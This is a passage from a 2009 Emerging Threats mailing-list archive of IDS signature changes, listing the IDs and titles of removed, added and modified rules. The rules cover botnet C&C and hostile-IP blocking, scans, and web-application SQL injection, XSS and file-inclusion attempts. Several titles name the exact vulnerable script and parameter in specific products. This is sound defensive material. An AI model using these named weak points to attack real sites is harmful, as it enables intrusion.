16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090815200012.131494504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Aug 15 16:00:11 2009 [***] [*] Rules modifications: [*] None. [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (32): 2500150 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500151 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500152 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500153 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500154 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500155 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500156 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500157 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500158 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500159 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500160 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500161 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500162 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500163 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500164 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500165 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510150 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510151 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510152 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510153 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510154 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510155 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510156 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510157 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510158 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510159 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510160 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510161 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510162 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510163 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510164 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510165 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (32): 2500150 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500151 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500152 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500153 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500154 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500155 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500156 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500157 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500158 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500159 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500160 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500161 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500162 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500163 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500164 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500165 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510150 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510151 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510152 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510153 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510154 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510155 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510156 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510157 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510158 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510159 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510160 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510161 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510162 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510163 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510164 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510165 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Aug 15 18:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 15 Aug 2009 18:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes Message-ID: <20090815220012.828434504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Aug 15 18:00:12 2009 [***] [+++] Added rules: [+++] 2002801 - ET POLICY Google Desktop User-Agent Detected (emerging-policy.rules) 2002838 - ET POLICY Google Search Appliance browsing the Internet (emerging-policy.rules) 2003634 - ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan (emerging-scan.rules) 2009714 - ET WEB Script tag in URI, Possible Cross Site Scripting Attempt (emerging-web.rules) 2009715 - ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt (emerging-web.rules) 2009716 - ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection (emerging-web_sql_injection.rules) 2009717 - ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009718 - ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection (emerging-web_sql_injection.rules) 2009719 - ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion (emerging-web_sql_injection.rules) 2009720 - ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion (emerging-web_sql_injection.rules) 2009723 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009724 - ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009725 - ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow (emerging-web.rules) 2009726 - ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009727 - ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection (emerging-web_sql_injection.rules) 2009728 - ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009729 - ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009730 - ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection (emerging-web_sql_injection.rules) 2009731 - ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection (emerging-web_sql_injection.rules) 2009733 - ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009734 - ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection (emerging-web_sql_injection.rules) 2009735 - ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow (emerging-web.rules) 2009736 - ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal (emerging-web_sql_injection.rules) 2009737 - ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete (emerging-web_sql_injection.rules) 2009738 - ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection (emerging-web_sql_injection.rules) 2009739 - ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection (emerging-web_sql_injection.rules) 2009740 - ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection (emerging-web_sql_injection.rules) 2009741 - ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection (emerging-web_sql_injection.rules) 2009742 - ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection (emerging-web_sql_injection.rules) 2009743 - ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009744 - ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection (emerging-web_sql_injection.rules) 2009745 - ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009746 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009747 - ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection (emerging-web_sql_injection.rules) 2009748 - ET WEB Possible Wordpress Administrative Password Reset Vulnerability (emerging-web.rules) 2009749 - ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan (emerging-scan.rules) 2404025 - ET DROP Known Bot C&C Server Traffic (group 26) (emerging-botcc.rules) 2405025 - ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2406730 - ET RBN Known Russian Business Network IP TCP (366) (emerging-rbn.rules) 2406731 - ET RBN Known Russian Business Network IP UDP (366) (emerging-rbn.rules) 2406732 - ET RBN Known Russian Business Network IP TCP (367) (emerging-rbn.rules) 2406733 - ET RBN Known Russian Business Network IP UDP (367) (emerging-rbn.rules) 2406734 - ET RBN Known Russian Business Network IP TCP (368) (emerging-rbn.rules) 2406735 - ET RBN Known Russian Business Network IP UDP (368) (emerging-rbn.rules) 2406736 - ET RBN Known Russian Business Network IP TCP (369) (emerging-rbn.rules) 2406737 - ET RBN Known Russian Business Network IP UDP (369) (emerging-rbn.rules) 2406738 - ET RBN Known Russian Business Network IP TCP (370) (emerging-rbn.rules) 2406739 - ET RBN Known Russian Business Network IP UDP (370) (emerging-rbn.rules) 2406740 - ET RBN Known Russian Business Network IP TCP (371) (emerging-rbn.rules) 2406741 - ET RBN Known Russian Business Network IP UDP (371) (emerging-rbn.rules) 2406742 - ET RBN Known Russian Business Network IP TCP (372) (emerging-rbn.rules) 2406743 - ET RBN Known Russian Business Network IP UDP (372) (emerging-rbn.rules) 2406744 - ET RBN Known Russian Business Network IP TCP (373) (emerging-rbn.rules) 2406745 - ET RBN Known Russian Business Network IP UDP (373) (emerging-rbn.rules) 2406746 - ET RBN Known Russian Business Network IP TCP (374) (emerging-rbn.rules) 2406747 - ET RBN Known Russian Business Network IP UDP (374) (emerging-rbn.rules) 2406748 - ET RBN Known Russian Business Network IP TCP (375) (emerging-rbn.rules) 2406749 - ET RBN Known Russian Business Network IP UDP (375) (emerging-rbn.rules) 2406750 - ET RBN Known Russian Business Network IP TCP (376) (emerging-rbn.rules) 2406751 - ET RBN Known Russian Business Network IP UDP (376) (emerging-rbn.rules) 2406752 - ET RBN Known Russian Business Network IP TCP (377) (emerging-rbn.rules) 2406753 - ET RBN Known Russian Business Network IP UDP (377) (emerging-rbn.rules) 2406754 - ET RBN Known Russian Business Network IP TCP (378) (emerging-rbn.rules) 2406755 - ET RBN Known Russian Business Network IP UDP (378) (emerging-rbn.rules) 2406756 - ET RBN Known Russian Business Network IP TCP (379) (emerging-rbn.rules) 2406757 - ET RBN Known Russian Business Network IP UDP (379) (emerging-rbn.rules) 2406758 - ET RBN Known Russian Business Network IP TCP (380) (emerging-rbn.rules) 2406759 - ET RBN Known Russian Business Network IP UDP (380) (emerging-rbn.rules) 2406760 - ET RBN Known Russian Business Network IP TCP (381) (emerging-rbn.rules) 2406761 - ET RBN Known Russian Business Network IP UDP (381) (emerging-rbn.rules) 2406762 - ET RBN Known Russian Business Network IP TCP (382) (emerging-rbn.rules) 2406763 - ET RBN Known Russian Business Network IP UDP (382) (emerging-rbn.rules) 2406764 - ET RBN Known Russian Business Network IP TCP (383) (emerging-rbn.rules) 2406765 - ET RBN Known Russian Business Network IP UDP (383) (emerging-rbn.rules) 2406766 - ET RBN Known Russian Business Network IP TCP (384) (emerging-rbn.rules) 2406767 - ET RBN Known Russian Business Network IP UDP (384) (emerging-rbn.rules) 2406768 - ET RBN Known Russian Business Network IP TCP (385) (emerging-rbn.rules) 2406769 - ET RBN Known Russian Business Network IP UDP (385) (emerging-rbn.rules) 2406770 - ET RBN Known Russian Business Network IP TCP (386) (emerging-rbn.rules) 2406771 - ET RBN Known Russian Business Network IP UDP (386) (emerging-rbn.rules) 2406772 - ET RBN Known Russian Business Network IP TCP (387) (emerging-rbn.rules) 2406773 - ET RBN Known Russian Business Network IP UDP (387) (emerging-rbn.rules) 2406774 - ET RBN Known Russian Business Network IP TCP (388) (emerging-rbn.rules) 2406775 - ET RBN Known Russian Business Network IP UDP (388) (emerging-rbn.rules) 2407730 - ET RBN Known Russian Business Network IP TCP - BLOCKING (366) (emerging-rbn-BLOCK.rules) 2407731 - ET RBN Known Russian Business Network IP UDP - BLOCKING (366) (emerging-rbn-BLOCK.rules) 2407732 - ET RBN Known Russian Business Network IP TCP - BLOCKING (367) (emerging-rbn-BLOCK.rules) 2407733 - ET RBN Known Russian Business Network IP UDP - BLOCKING (367) (emerging-rbn-BLOCK.rules) 2407734 - ET RBN Known Russian Business Network IP TCP - BLOCKING (368) (emerging-rbn-BLOCK.rules) 2407735 - ET RBN Known Russian Business Network IP UDP - BLOCKING (368) (emerging-rbn-BLOCK.rules) 2407736 - ET RBN Known Russian Business Network IP TCP - BLOCKING (369) (emerging-rbn-BLOCK.rules) 2407737 - ET RBN Known Russian Business Network IP UDP - BLOCKING (369) (emerging-rbn-BLOCK.rules) 2407738 - ET RBN Known Russian Business Network IP TCP - BLOCKING (370) (emerging-rbn-BLOCK.rules) 2407739 - ET RBN Known Russian Business Network IP UDP - BLOCKING (370) (emerging-rbn-BLOCK.rules) 2407740 - ET RBN Known Russian Business Network IP TCP - BLOCKING (371) (emerging-rbn-BLOCK.rules) 2407741 - ET RBN Known Russian Business Network IP UDP - BLOCKING (371) (emerging-rbn-BLOCK.rules) 2407742 - ET RBN Known Russian Business Network IP TCP - BLOCKING (372) (emerging-rbn-BLOCK.rules) 2407743 - ET RBN Known Russian Business Network IP UDP - BLOCKING (372) (emerging-rbn-BLOCK.rules) 2407744 - ET RBN Known Russian Business Network IP TCP - BLOCKING (373) (emerging-rbn-BLOCK.rules) 2407745 - ET RBN Known Russian Business Network IP UDP - BLOCKING (373) (emerging-rbn-BLOCK.rules) 2407746 - ET RBN Known Russian Business Network IP TCP - BLOCKING (374) (emerging-rbn-BLOCK.rules) 2407747 - ET RBN Known Russian Business Network IP UDP - BLOCKING (374) (emerging-rbn-BLOCK.rules) 2407748 - ET RBN Known Russian Business Network IP TCP - BLOCKING (375) (emerging-rbn-BLOCK.rules) 2407749 - ET RBN Known Russian Business Network IP UDP - BLOCKING (375) (emerging-rbn-BLOCK.rules) 2407750 - ET RBN Known Russian Business Network IP TCP - BLOCKING (376) (emerging-rbn-BLOCK.rules) 2407751 - ET RBN Known Russian Business Network IP UDP - BLOCKING (376) (emerging-rbn-BLOCK.rules) 2407752 - ET RBN Known Russian Business Network IP TCP - BLOCKING (377) (emerging-rbn-BLOCK.rules) 2407753 - ET RBN Known Russian Business Network IP UDP - BLOCKING (377) (emerging-rbn-BLOCK.rules) 2407754 - ET RBN Known Russian Business Network IP TCP - BLOCKING (378) (emerging-rbn-BLOCK.rules) 2407755 - ET RBN Known Russian Business Network IP UDP - BLOCKING (378) (emerging-rbn-BLOCK.rules) 2407756 - ET RBN Known Russian Business Network IP TCP - BLOCKING (379) (emerging-rbn-BLOCK.rules) 2407757 - ET RBN Known Russian Business Network IP UDP - BLOCKING (379) (emerging-rbn-BLOCK.rules) 2407758 - ET RBN Known Russian Business Network IP TCP - BLOCKING (380) (emerging-rbn-BLOCK.rules) 2407759 - ET RBN Known Russian Business Network IP UDP - BLOCKING (380) (emerging-rbn-BLOCK.rules) 2407760 - ET RBN Known Russian Business Network IP TCP - BLOCKING (381) (emerging-rbn-BLOCK.rules) 2407761 - ET RBN Known Russian Business Network IP UDP - BLOCKING (381) (emerging-rbn-BLOCK.rules) 2407762 - ET RBN Known Russian Business Network IP TCP - BLOCKING (382) (emerging-rbn-BLOCK.rules) 2407763 - ET RBN Known Russian Business Network IP UDP - BLOCKING (382) (emerging-rbn-BLOCK.rules) 2407764 - ET RBN Known Russian Business Network IP TCP - BLOCKING (383) (emerging-rbn-BLOCK.rules) 2407765 - ET RBN Known Russian Business Network IP UDP - BLOCKING (383) (emerging-rbn-BLOCK.rules) 2407766 - ET RBN Known Russian Business Network IP TCP - BLOCKING (384) (emerging-rbn-BLOCK.rules) 2407767 - ET RBN Known Russian Business Network IP UDP - BLOCKING (384) (emerging-rbn-BLOCK.rules) 2407768 - ET RBN Known Russian Business Network IP TCP - BLOCKING (385) (emerging-rbn-BLOCK.rules) 2407769 - ET RBN Known Russian Business Network IP UDP - BLOCKING (385) (emerging-rbn-BLOCK.rules) 2407770 - ET RBN Known Russian Business Network IP TCP - BLOCKING (386) (emerging-rbn-BLOCK.rules) 2407771 - ET RBN Known Russian Business Network IP UDP - BLOCKING (386) (emerging-rbn-BLOCK.rules) 2407772 - ET RBN Known Russian Business Network IP TCP - BLOCKING (387) (emerging-rbn-BLOCK.rules) 2407773 - ET RBN Known Russian Business Network IP UDP - BLOCKING (387) (emerging-rbn-BLOCK.rules) 2407774 - ET RBN Known Russian Business Network IP TCP - BLOCKING (388) (emerging-rbn-BLOCK.rules) 2407775 - ET RBN Known Russian Business Network IP UDP - BLOCKING (388) (emerging-rbn-BLOCK.rules) [///] Modified active rules: [///] 2001239 - ET POLICY Cisco Device in Config Mode (emerging-policy.rules) 2001240 - ET POLICY Cisco Device New Config Built (emerging-policy.rules) 2002849 - ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet (emerging-web_sql_injection.rules) 2009701 - ET CURRENT_EVENTS DNS BIND 9 Dynamic Update DoS attempt (emerging.rules) 2009711 - ET TROJAN Win32.Runner (Often Rootkit) - POST (emerging-virus.rules) 2009712 - ET MALWARE Adware PlusDream - GET Config Download/Update (emerging-malware.rules) 2009713 - ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected (emerging.rules) 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules) 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules) 2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules) 2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules) 2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules) 2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules) 2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules) 2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules) 2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules) 2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules) 2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules) 2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules) 2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules) 2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules) 2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules) 2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules) 2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules) 2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules) 2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules) 2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules) 2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules) 2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules) 2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules) 2404021 - ET DROP Known Bot C&C Server Traffic (group 22) (emerging-botcc.rules) 2404022 - ET DROP Known Bot C&C Server Traffic (group 23) (emerging-botcc.rules) 2404023 - ET DROP Known Bot C&C Server Traffic (group 24) (emerging-botcc.rules) 2404024 - ET DROP Known Bot C&C Server Traffic (group 25) (emerging-botcc.rules) 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405024 - ET DROP Known Bot C&C Traffic (group 25) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2406000 - ET RBN Known Russian Business Network IP TCP (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network IP UDP (1) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network IP TCP (2) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network IP UDP (2) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network IP TCP (3) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network IP UDP (3) (emerging-rbn.rules) 2406006 - ET RBN Known Russian Business Network IP TCP (4) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network IP UDP (4) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network IP TCP (5) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network IP UDP (5) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network IP TCP (6) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business Network IP UDP (6) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network IP TCP (7) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network IP UDP (7) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network IP TCP (8) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network IP UDP 